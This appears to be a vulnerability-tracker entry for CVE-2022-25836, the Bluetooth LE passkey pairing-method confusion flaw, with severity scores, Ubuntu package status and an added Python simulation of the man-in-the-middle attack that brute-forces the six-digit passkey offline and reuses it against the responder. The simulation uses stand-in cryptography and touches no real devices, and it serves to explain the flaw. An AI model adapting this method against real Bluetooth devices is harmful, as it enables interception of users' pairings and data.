CVSS3 Metric | Value |
---|---|
Attack Vector | ADJACENT |
Attack Complexity | HIGH |
Privileges Required | NONE |
User Interaction | REQUIRED |
Scope | CHANGED |
Confidentiality Impact | HIGH |
Integrity Impact | HIGH |
Availability Impact | NONE |
Vector String | CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N |
EPSS | Value |
---|---|
Percentile | 23.0% |
Bluetooth® Low Energy Pairing in Bluetooth Core Specification v4.0 through
v5.3 may permit an unauthenticated MITM within radio range (adjacent access)
to acquire pairing credentials with two pairing devices. The MITM negotiates
Legacy Passkey Pairing with the pairing Initiator and Secure Connections
Passkey Pairing with the pairing Responder, then brute-forces the Passkey the
user entered into the Initiator. This is feasible because a Passkey is six
decimal digits (fewer than 2^20 values) and the Legacy confirm value the
Initiator sends can be checked offline against every candidate once its
random nonce is revealed. The MITM then uses the recovered Passkey value to
complete authentication with the Responder. This is a Bluetooth pairing
method confusion attack: each victim device believes it is pairing with the
other, while each is actually pairing with the attacker under a different
pairing method.
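The exchange described above, as an added example that is not code from the CVE record, the Bluetooth SIG, or the Ubuntu kernel packages listed below. It models the attacker sitting between a Legacy Passkey Entry Initiator (A) and a Secure Connections Passkey Entry Responder (B): A's confirm value is brute-forced over the six-digit passkey space, and the recovered passkey is then used to pass B's 20-round commitment check with the attacker's own public key. Assumptions, also marked in the comments: the specification's AES-128-based c1 and f4 functions are replaced by a SHA-256 stand-in with the same input structure (device address fields omitted), ECDH public keys are random byte strings, the Pairing Request/Response bytes are constructed, and the Sconfirm/Srand half of the legacy exchange is left out because recovering the passkey needs only Mconfirm and Mrand.

```python
"""Model of the CVE-2022-25836 pairing-method confusion attack (added example).

Assumptions: SHA-256 stands in for the spec's AES-128-based c1 (legacy confirm)
and f4 (Secure Connections commitment); public keys are random bytes; address
fields are omitted from c1; the Initiator (A) runs Legacy Passkey Entry and the
Responder (B) runs Secure Connections Passkey Entry.
"""
import hashlib
import os

PASSKEY_MAX = 1_000_000   # Passkey Entry passkey is 6 decimal digits: 000000..999999 (< 2**20)
PASSKEY_BITS = 20         # SC Passkey Entry commits to one passkey bit per round, 20 rounds


def prf(key: bytes, msg: bytes) -> bytes:
    """Keyed one-way function standing in for the spec's AES-based c1/f4 (assumption).
    Every caller passes a 16-byte key, so plain concatenation is unambiguous."""
    return hashlib.sha256(key + msg).digest()[:16]


def passkey_to_tk(passkey: int) -> bytes:
    """Legacy Passkey Entry: the passkey itself is the TK, a 128-bit little-endian integer."""
    return passkey.to_bytes(16, "little")


def c1(tk: bytes, rand: bytes, preq: bytes, pres: bytes) -> bytes:
    """Legacy confirm value: binds TK to a 128-bit nonce and the Pairing Request/Response."""
    return prf(tk, rand + preq + pres)


def f4(u: bytes, v: bytes, x: bytes, z: int) -> bytes:
    """SC commitment f4(U, V, X, Z): public keys U, V, nonce X, Z = 0x80 | passkey bit."""
    return prf(x, u + v + bytes([z]))


def legacy_initiator_confirm(passkey: int, preq: bytes, pres: bytes):
    """A computes Mconfirm = c1(TK, Mrand, preq, pres), sends it, and later reveals Mrand."""
    mrand = os.urandom(16)
    return c1(passkey_to_tk(passkey), mrand, preq, pres), mrand


def brute_force_passkey(mconfirm: bytes, mrand: bytes, preq: bytes, pres: bytes) -> int:
    """MITM, offline: at most 10**6 evaluations of c1 over the observed Mconfirm/Mrand.
    This is why Legacy Passkey Entry offers no protection against an active MITM."""
    for guess in range(PASSKEY_MAX):
        if c1(passkey_to_tk(guess), mrand, preq, pres) == mconfirm:
            return guess
    raise ValueError("no passkey in 000000..999999 produced this confirm value")


def sc_passkey_entry(pk_a: bytes, pk_b: bytes, passkey_a: int, passkey_b: int) -> bool:
    """SC Passkey Entry between a party holding passkey_a and a Responder holding
    passkey_b. Each round both sides commit to bit i under a fresh nonce, reveal the
    nonce, and recompute the peer's commitment with their own bit. True only if every
    one of the 20 rounds verifies, i.e. the passkeys are identical."""
    for i in range(PASSKEY_BITS):
        bit_a = (passkey_a >> i) & 1
        bit_b = (passkey_b >> i) & 1
        na, nb = os.urandom(16), os.urandom(16)
        ca = f4(pk_a, pk_b, na, 0x80 | bit_a)        # A -> B: Ca_i
        cb = f4(pk_b, pk_a, nb, 0x80 | bit_b)        # B -> A: Cb_i
        if f4(pk_a, pk_b, na, 0x80 | bit_b) != ca:  # A reveals Na, B checks with its bit
            return False
        if f4(pk_b, pk_a, nb, 0x80 | bit_a) != cb:  # B reveals Nb, A checks with its bit
            return False
    return True


def run_attack(passkey: int) -> dict:
    """End to end: A (legacy) <-> MITM <-> B (SC). The same passkey is on both victim
    devices, displayed on B and typed into A, as in a normal Passkey Entry pairing."""
    preq = bytes.fromhex("01030005100707")  # constructed Pairing Request bytes
    pres = bytes.fromhex("02030005100707")  # constructed Pairing Response bytes
    mconfirm, mrand = legacy_initiator_confirm(passkey, preq, pres)  # A pairs with the MITM
    recovered = brute_force_passkey(mconfirm, mrand, preq, pres)     # MITM recovers the passkey
    pk_mitm, pk_b = os.urandom(64), os.urandom(64)                   # MITM uses its own key pair
    ok = sc_passkey_entry(pk_mitm, pk_b, recovered, passkey)         # MITM authenticates to B
    return {"recovered": recovered, "sc_pairing_ok": ok}


if __name__ == "__main__":
    print(run_attack(482913))
```

The search in `brute_force_passkey` finishes in around a second of SHA-256 work on a laptop, and the spec's AES-based c1 is no harder to evaluate. The `sc_passkey_entry` check then shows the point of the CVE: once the MITM holds the right passkey, the Responder's commitment rounds accept the attacker's own public key, so the weakness is the Initiator being allowed to use Legacy Passkey Entry while the Responder uses Secure Connections Passkey Entry with the same user-entered value, not the strength of the Secure Connections commitments themselves.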
Author | Note |
---|---|
sbeattie | unfixed upstream as of 2023.01.10 |
OS | OS Version | Architecture | Package | Package Version | Filename |
---|---|---|---|---|---|
ubuntu | 18.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 20.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 22.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 24.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 14.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 16.04 | noarch | linux | < any | UNKNOWN |
ubuntu | 20.04 | noarch | linux-aws | < any | UNKNOWN |
ubuntu | 22.04 | noarch | linux-aws | < any | UNKNOWN |
ubuntu | 24.04 | noarch | linux-aws | < any | UNKNOWN |
ubuntu | 20.04 | noarch | linux-aws-5.15 | < any | UNKNOWN |
launchpad.net/bugs/cve/CVE-2022-25836
nvd.nist.gov/vuln/detail/CVE-2022-25836
security-tracker.debian.org/tracker/CVE-2022-25836
www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/confusion-in-ble-passkey/
www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/reporting-security/
www.cve.org/CVERecord?id=CVE-2022-25836